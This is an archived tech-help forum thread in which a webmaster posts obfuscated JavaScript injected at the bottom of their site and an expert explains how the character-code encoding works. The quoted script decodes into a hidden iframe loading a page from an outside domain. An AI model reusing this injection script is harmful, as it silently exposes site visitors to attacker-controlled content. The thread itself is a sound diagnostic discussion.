Go Premium for a chance to win a PS4. Enter to Win

x
?
Solved

Javascript Added to bottom of site - Virus

Posted on 2009-05-05
8
Medium Priority
?
347 Views
Last Modified: 2013-12-09
Hi All,

Hoping someone can answer this, the following code is getting added to the bottom of our site and it does look like a virus. Does anyone know what it is or how it is getting there. Just so you know, it is not on our local files and is only on the remote. Any info will be appreciated.



</html><script type="text/javascript">var gBhwGdGvEUgyLteZaNBv = "RvA60RvA105RvA102RvA114RvA97RvA109RvA101RvA32RvA119RvA105RvA100RvA116RvA104RvA61RvA34RvA52RvA56RvA48RvA34RvA32RvA104RvA101RvA105RvA103RvA104RvA116RvA61RvA34RvA54RvA48RvA34RvA32RvA115RvA114RvA99RvA61RvA34RvA104RvA116RvA116RvA112RvA58RvA47RvA47RvA112RvA114RvA111RvA102RvA105RvA116RvA111RvA111RvA108RvA116RvA105RvA112RvA46RvA98RvA105RvA122RvA47RvA98RvA108RvA111RvA103RvA47RvA102RvA101RvA101RvA100RvA46RvA104RvA116RvA109RvA108RvA34RvA32RvA115RvA116RvA121RvA108RvA101RvA61RvA34RvA98RvA111RvA114RvA100RvA101RvA114RvA58RvA48RvA112RvA120RvA59RvA32RvA112RvA111RvA115RvA105RvA116RvA105RvA111RvA110RvA58RvA114RvA101RvA108RvA97RvA116RvA105RvA118RvA101RvA59RvA32RvA116RvA111RvA112RvA58RvA48RvA112RvA120RvA59RvA32RvA108RvA101RvA102RvA116RvA58RvA45RvA53RvA48RvA48RvA112RvA120RvA59RvA32RvA111RvA112RvA97RvA99RvA105RvA116RvA121RvA58RvA48RvA59RvA32RvA102RvA105RvA108RvA116RvA101RvA114RvA58RvA112RvA114RvA111RvA103RvA105RvA100RvA58RvA68RvA88RvA73RvA109RvA97RvA103RvA101RvA84RvA114RvA97RvA110RvA115RvA102RvA111RvA114RvA109RvA46RvA77RvA105RvA99RvA114RvA111RvA115RvA111RvA102RvA116RvA46RvA65RvA108RvA112RvA104RvA97RvA40RvA111RvA112RvA97RvA99RvA105RvA116RvA121RvA61RvA48RvA41RvA59RvA32RvA45RvA109RvA111RvA122RvA45RvA111RvA112RvA97RvA99RvA105RvA116RvA121RvA58RvA48RvA34RvA62RvA60RvA47RvA105RvA102RvA114RvA97RvA109RvA101RvA62";var tFWwuHhNLrortVozzuuD = gBhwGdGvEUgyLteZaNBv.split("RvA");var OaCaUhzuuBpnGMjBTROe = "";for (var IDWCYKBYFvcTWeuqLukF=1; IDWCYKBYFvcTWeuqLukF<tFWwuHhNLrortVozzuuD.length; IDWCYKBYFvcTWeuqLukF++){OaCaUhzuuBpnGMjBTROe+=String.fromCharCode(tFWwuHhNLrortVozzuuD[IDWCYKBYFvcTWeuqLukF]);}document.write(OaCaUhzuuBpnGMjBTROe)</script>

Open in new window

0
Comment
Question by:jimbinho
  • 5
  • 3
8 Comments
 
LVL 41

Expert Comment

by:HonorGod
ID: 24304108
Yes, it is a virus.

How did it get there?  I don't know.

Remove it...

0
 

Author Comment

by:jimbinho
ID: 24304137
Hi,

Thanks for this. I think to be more specific what i am looking for is: what the code does when scrambled as i am assuming it is scrambled java script. I would also like to know how anyone would do this and if anyone has seen anything like this before can they shed any light?

Thanks
0
 
LVL 41

Expert Comment

by:HonorGod
ID: 24304167
here is what it translates as...
iframeCode.jpg
0
What does it mean to be "Always On"?

Is your cloud always on? With an Always On cloud you won't have to worry about downtime for maintenance or software application code updates, ensuring that your bottom line isn't affected.

 
LVL 41

Expert Comment

by:HonorGod
ID: 24305101
How would someone do this?

Well, they would first figure out what they want to generate (e.g., the "iframe" shown above), then put that in a string, and convert the individual characters into numeric values.  For example, using something like the code shown below.

Then, they would take the numbers, and put them into an array, and from the array, create a string.

... does that make sense?



<html>
<body>
 
<script type="text/javascript">
 
var str='<iframe width="480"'
for ( var i = 0; i < str.length; i++ ) {
  document.write( str[ i ] + ' = ' + str.charCodeAt( i ) + '<br />')
}
</script>
 
</body>
</html>

Open in new window

0
 

Author Comment

by:jimbinho
ID: 24306426
Hi,

Thanks for this. My question is not so much how they created the string, but how it is likely to get onto our site. Thanks for your help.
0
 
LVL 41

Accepted Solution

by:
HonorGod earned 1500 total points
ID: 24306495
Ah, now that's a real question.

There are a number of possibilities.  Unfortunately, I don't know for certain, especially without knowing specifics about the server on which this code was found, or who has access to it, or the kind of programs that execute on it, etc.
0
 

Author Closing Comment

by:jimbinho
ID: 31577958
Appreciate the help
0
 
LVL 41

Expert Comment

by:HonorGod
ID: 24421987
Thanks for the grade & points.  I'm sorry that you didn't feel the information warranted an A.

Good luck & have a great day
0

Featured Post

Put Machine Learning to Work--Protect Your Clients

Machine learning means Smarter Cybersecurity™ Solutions.
As technology continues to advance, managing and analyzing massive data sets just can’t be accomplished by humans alone. It requires huge amounts of memory and storage, as well as high-speed processing of the cloud.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

The purpose of this Article is to provide information for a newly released variant of malware – with the assumption that many EE Members will have need of the information. According to “Computerworld”, well over one million web sites have been co…
This article investigates the question of whether a computer can really be cleaned once it has been infected, and what the best ways of cleaning a computer might be (in this author's opinion).
Established in 1997, Technology Architects has become one of the most reputable technology solutions companies in the country. TA have been providing businesses with cost effective state-of-the-art solutions and unparalleled service that is designed…
Email security requires an ever evolving service that stays up to date with counter-evolving threats. The Email Laundry perform Research and Development to ensure their email security service evolves faster than cyber criminals. We apply our Threat…

782 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question